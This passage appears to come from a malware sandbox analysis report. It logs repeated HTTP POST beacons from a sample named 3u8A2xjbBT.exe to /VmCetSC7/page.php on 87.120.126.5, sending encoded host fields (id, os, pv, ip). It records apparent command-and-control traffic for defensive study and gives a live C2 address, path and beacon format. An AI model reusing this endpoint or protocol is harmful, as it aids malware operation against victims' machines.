                                    Date: Wed, 30 Oct 2024 11:24:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    11 | 192.168.2.7 | 49986 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:41.322659016 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:41.675647974 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:42.128978014 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:42.146981955 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    12 | 192.168.2.7 | 49987 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:56.058618069 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:56.410070896 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:57.055794954 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:57.055819035 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0
                                    Oct 30, 2024 12:24:57.056241989 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    13 | 192.168.2.7 | 49988 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:24:57.355227947 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:57.707786083 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:58.211189985 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:58.222182989 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    14 | 192.168.2.7 | 49989 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:09.764139891 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:10.113370895 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:10.590372086 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:10.614449978 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    15 | 192.168.2.7 | 49990 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:10.104289055 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:10.457149982 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:10.952028990 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:10.961870909 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    16 | 192.168.2.7 | 49991 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:17.260421991 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:17.613322020 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:18.083045959 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:18.093244076 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    17 | 192.168.2.7 | 49992 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:19.495362997 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:19.847637892 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:20.318298101 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:20.331440926 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    18 | 192.168.2.7 | 49993 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:33.176342964 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:33.535197973 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:33.999937057 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:34.013309956 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    19 | 192.168.2.7 | 49994 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:36.682791948 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:37.035238028 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:37.531061888 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:37.546988964 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    20 | 192.168.2.7 | 49995 | 87.120.126.5 | 80 | 2908 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:48.968986034 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:49.316513062 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:49.817302942 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:49.828653097 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    21 | 192.168.2.7 | 49996 | 87.120.126.5 | 80 | 4704 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:53.073003054 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:53.426018953 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:53.884582996 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:53.892601967 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    22 | 192.168.2.7 | 49997 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:25:53.120354891 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:53.473267078 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:53.953432083 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:53.960656881 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    23 | 192.168.2.7 | 49998 | 87.120.126.5 | 80 | 6464 | C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:26:00.272008896 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:00.633143902 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:01.089189053 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:01.097759008 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    24 | 192.168.2.7 | 49999 | 87.120.126.5 | 80
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:26:13.807681084 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:14.160382986 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:14.634841919 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:14.651279926 CET | 175 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:26:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    25 | 192.168.2.7 | 50000 | 87.120.126.5 | 80
                                    Timestamp | Bytes transferred | Direction | Data
                                    Oct 30, 2024 12:26:18.244823933 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:26:18.597879887 CET | 471 | OUT | Data Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:26:19.077151060 CET | 25 | IN | HTTP/1.1 100 Continue
                                    Oct 30, 2024 12:26:19.087575912 CET | 175 | IN | HTTP/1.1 200 OK
